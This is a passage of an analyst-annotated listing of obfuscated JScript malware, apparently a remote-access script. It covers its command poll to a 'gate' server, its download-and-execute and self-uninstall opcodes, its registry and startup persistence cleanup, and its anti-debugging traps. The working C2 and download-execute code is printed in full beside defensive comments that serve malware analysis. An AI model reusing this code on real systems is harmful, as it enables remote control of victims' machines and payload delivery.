203 | } | |
// Command poll. Reads the stored `SaveSettings` registry value, sends a
// synchronous XMLHTTP request to `gate` and dispatches on the first
// '|'-separated field of the reply. Before the request it runs two self-defence
// wrappers that stringify functions and test them against regexes, invoking the
// `_0x2150f9` trap when the source looks modified -- these are the report's
// "eval() to check own source code" findings.
204 | function getCommand() { | |
// Once-only wrapper factory: the returned function runs its second argument a
// single time (via a decoded method, presumably apply) and then becomes a no-op.
205 | var _0x373146 = _0x4f83db, _0x22eae4 = _0x5abc4a, | |
206 | _0x3c82a3 = function () { | |
207 | var _0x4e8d66 = ! ! []; | |
208 | return function (_0xd91065, _0x49581c) { | |
209 | var _0x6890f8 = _0x4e8d66 ? | |
210 | function () { | |
211 | var _0x31a666 = _0x1fc1; | |
212 | if ( _0x49581c ) | |
213 | { | |
214 | var _0x2c2df6 = _0x49581c[_0x31a666 ( 0x160, 'DH)J' ) ] ( _0xd91065, arguments ); | |
215 | return _0x49581c = null, _0x2c2df6; | |
216 | } | |
217 | } : | |
218 | function () { | |
219 | }; | |
220 | return _0x4e8d66 = ! [], _0x6890f8; | |
221 | }; | |
222 | } ( ), | |
// Self-check #1: builds a function from the plaintext source
// 'return /" + this + "/' (i.e. Function-constructor evaluation), calls it, and
// tests the resulting regex-like value against `_0x2cc4e4` itself.
223 | _0x2cc4e4 = _0x3c82a3 ( this, | |
224 | function () { | |
225 | var _0x165709 = function () { | |
226 | var _0x4e308a = _0x1fc1, _0x50e1a3 = _0x26ae, _0x4f1543 = _0x165709[_0x50e1a3 ( '0x179' ) ] ( 'return\x20/\x22\x20+\x20this\x20+\x20\x22/' ) ( ) [_0x4e308a ( '0x148', 'Fq[d' ) ] ( _0x4e308a ( 0x145, 'hIr#' ) ); | |
227 | return ! _0x4f1543[_0x4e308a ( '0x16a', '2kiA' ) ] ( _0x2cc4e4 ); | |
228 | }; | |
229 | return _0x165709 ( ); | |
230 | } ) ; | |
231 | _0x2cc4e4 ( ); | |
// Same once-only wrapper, with `apply` in plaintext.
232 | var _0x1ea5df = function () { | |
233 | var _0x14436f = ! ! []; | |
234 | return function (_0x5126a2, _0xc5637) { | |
235 | var _0xe720db = _0x14436f ? | |
236 | function () { | |
237 | if ( _0xc5637 ) | |
238 | { | |
239 | var _0x3e456b = _0xc5637['apply'] ( _0x5126a2, arguments ); | |
240 | return _0xc5637 = null, _0x3e456b; | |
241 | } | |
242 | } : | |
243 | function () { | |
244 | }; | |
245 | return _0x14436f = ! [], _0xe720db; | |
246 | }; | |
247 | } ( ); | |
// Self-check #2: `_0x4ff68c` is the trap closure returned by `_0x2150f9(<truthy>)`.
// A decoded regex and the plaintext regex  \+\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)
// are tested against that closure's stringified source; if either fails the trap
// is run with the string '0' (its `while (true) {}` branch), otherwise
// `_0x2150f9()` runs its numeric branch -- see that function.
248 | ( function () { | |
249 | _0x1ea5df ( this, | |
250 | function () { | |
251 | var _0x5b1a0b = _0x26ae, _0x5f0503 = _0x1fc1, _0x522cd6 = new RegExp ( _0x5f0503 ( '0x141', '9fc#' ) ), _0x82cad1 = new RegExp ( '\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)', 'i' ), _0x4ff68c = _0x2150f9 ( _0x5b1a0b ( 0x165 ) ); | |
252 | ! _0x522cd6['test'] ( _0x4ff68c + _0x5b1a0b ( '0x166' ) ) || ! _0x82cad1[_0x5b1a0b ( 0x18f ) ] ( _0x4ff68c + _0x5b1a0b ( '0x142' ) ) ? _0x4ff68c ( '0' ) : _0x2150f9 ( ); | |
253 | } ) ( ); | |
254 | } ( ) ); | |
// Read the saved value (method is a table string; the value is written with the
// plaintext RegWrite in case '00' below); empty string if it does not exist yet.
255 | try | |
256 | { | |
257 | var _0x3d06b9 = shellobj[_0x22eae4 ( '0x147' ) ] ( SaveSettings ); | |
258 | } | |
259 | catch ( _0xcb3062 ) | |
260 | { | |
261 | var _0x3d06b9 = ''; | |
262 | } | |
// XMLHTTP request to `gate`: open(<decoded verb>, gate, false), then
// setRequestHeader(<decoded name>, user_agent) -- presumably User-Agent -- and one
// more header with both name and value decoded.
263 | var _0x415288 = new ActiveXObject ( _0x22eae4 ( '0x164' ) ); | |
264 | _0x415288[_0x22eae4 ( '0x149' ) ] ( _0x22eae4 ( 0x176 ), gate, ! [] ), _0x415288['setRequestHeader'] ( _0x22eae4 ( 0x140 ), user_agent ), _0x415288[_0x373146 ( '0x181', ')q)E' ) ] ( _0x22eae4 ( '0x16f' ), _0x22eae4 ( 0x182 ) ); | |
// When the stored value is shorter than 8 characters an extra decoded field is
// appended to the body (a first-contact marker, presumably).
265 | if ( _0x3d06b9[_0x373146 ( '0x152', 'DH)J' ) ] < 0x8 ) | |
266 | var _0x477ace = _0x373146 ( '0x14b', 'DH)J' ); | |
267 | else | |
268 | var _0x477ace = ''; | |
// Beacon body: <decoded> + a shellobj lookup (same method index as `temp`, i.e.
// an environment expansion) + '|' + stored value + <decoded> + extra field.
// Network signature: synchronous request from wscript.exe with a fixed
// User-Agent and a '|'-delimited body/reply.
269 | _0x415288[_0x22eae4 ( '0x13b' ) ] ( _0x373146 ( '0x168', '9]ID' ) + shellobj[_0x22eae4 ( '0x190' ) ] ( _0x22eae4 ( 0x177 ) ) + '|' + _0x3d06b9 + _0x373146 ( 0x173, '$G#%' ) + _0x477ace ); | |
// Reply (decoded property, responseText presumably) split on '|'; field 0 is the opcode.
270 | var _0x115c69 = _0x415288[_0x22eae4 ( '0x16e' ) ], _0x3fb45b = _0x115c69[_0x22eae4 ( '0x17a' ) ] ( '|' ); | |
// '00': store field 1 under SaveSettings.  '01': Download_exec to temp (mode 0).
// '03': Download_exec in mode 1 (over the WSH path, see that function).
// '19': uninstall -- delete the HKCU entry, the startup and installdir copies and
// the SaveSettings value (decoded shellobj method), then a decoded `WSH` call
// with no arguments, presumably quit. Unknown opcodes are ignored.
271 | switch ( _0x3fb45b[0x0] ) { | |
272 | case '00' : | |
273 | shellobj['RegWrite'] ( SaveSettings, _0x3fb45b[0x1], _0x22eae4 ( '0x157' ) ); | |
274 | break ; | |
275 | case '01' : | |
276 | Download_exec ( _0x3fb45b[0x1], 0x0 ); | |
277 | break ; | |
278 | case '03' : | |
279 | Download_exec ( _0x3fb45b[0x1], 0x1 ); | |
280 | break ; | |
281 | case '19' : | |
282 | shellobj['regdelete'] ( HKCU + WSH[_0x373146 ( '0x161', '$G#%' ) ][_0x22eae4 ( '0x17a' ) ] ( '.' ) [0x0] ), filesystemobj['deletefile'] ( startup + WSH[_0x22eae4 ( 0x15f ) ], ! ! [] ), filesystemobj['deletefile'] ( installdir + WSH['scriptname'], ! ! [] ), shellobj[_0x373146 ( '0x17b', 'i(]w' ) ] ( SaveSettings ), WSH[_0x22eae4 ( '0x143' ) ] ( ); | |
283 | break ; | |
284 | } | |
285 | } | |
// CPU busy-wait instead of WScript.Sleep: records a start timestamp (decoded
// method; the plaintext `getTime` is used for the comparison) and spins, creating
// a Date per iteration, until more than `_0x2c0b28` ms have elapsed or 0x989680
// (10,000,000) iterations have run -- so on a fast host it may return before the
// requested time. Shows up as sustained wscript.exe CPU use between beacons.
286 | function sleep(_0x2c0b28) { | |
287 | var _0x2f1f4c = _0x4f83db, _0x3087a4 = new Date ( ) [_0x2f1f4c ( '0x13c', 'tSe#' ) ] ( ); | |
288 | for ( var _0x1c89e7 = 0x0 ; _0x1c89e7 < 0x989680 ; _0x1c89e7 ++ ) | |
289 | { | |
290 | if ( new Date ( ) ['getTime'] ( ) - _0x3087a4 > _0x2c0b28 ) | |
291 | break ; | |
292 | } | |
293 | } | |
// Anti-analysis trap used by getCommand's self-checks. With a truthy argument
// it returns the inner closure `_0x35b8c4`; with a falsy one it runs the closure
// with 0 and swallows whatever it throws.
294 | function _0x2150f9(_0x5ba605) { | |
295 | function _0x35b8c4(_0x586539) { | |
296 | var _0x397bed = _0x26ae, _0x4b3546 = _0x1fc1; | |
// String argument: build a function from the plaintext source 'while (true) {}'
// via Function.prototype.constructor and invoke it through a decoded method with
// 'counter' as argument -- an intentional hang.
297 | if ( typeof _0x586539 === 'string' ) | |
298 | return function (_0x54187a) {
}['constructor'] ( 'while\x20(true)\x20{}' ) [_0x4b3546 ( '0x163', '8p52' ) ] ( 'counter' ); | |
299 | else | |
// Numeric argument: (''+x/x).<decoded> !== 1 || x % 20 === 0 selects one of two
// Function-constructed bodies; the first is built from 'debu' + <decoded>, which
// reads as a `debugger` statement (confirm by decoding). For x = 0, 0/0 is NaN, so
// the first branch is taken. The call then recurses with ++x without a base case;
// the recursion is only stopped by the try/catch in the outer function.
300 | ( '' + _0x586539 / _0x586539 )[_0x4b3546 ( 0x15a, 'Y!nA' ) ] !== 0x1 || _0x586539 % 0x14 === 0x0 ? function () {
return ! ! [ ];}[_0x4b3546 ( '0x138', 'HQ15' ) ] ( 'debu' + _0x4b3546 ( '0x144', 'ySE2' ) ) [_0x397bed ( 0x158 ) ] ( _0x4b3546 ( '0x183', 'uBWS' ) ) : function () {
return ! [ ];}[_0x397bed ( '0x179' ) ] ( _0x397bed ( '0x174' ) + _0x4b3546 ( '0x13f', 'i(]w' ) ) [_0x4b3546 ( 0x151, '2kiA' ) ] ( _0x4b3546 ( '0x178', 'U!CQ' ) ); | |
301 | _0x35b8c4 ( ++ _0x586539 ); | |
302 | } | |
303 | try | |
304 | { | |
305 | if ( _0x5ba605 ) | |
306 | return _0x35b8c4; | |
307 | else | |
308 | _0x35b8c4 ( 0x0 ); | |
309 | } | |
310 | catch ( _0x1607e6 ) | |
311 | { | |
312 | } | |
313 | }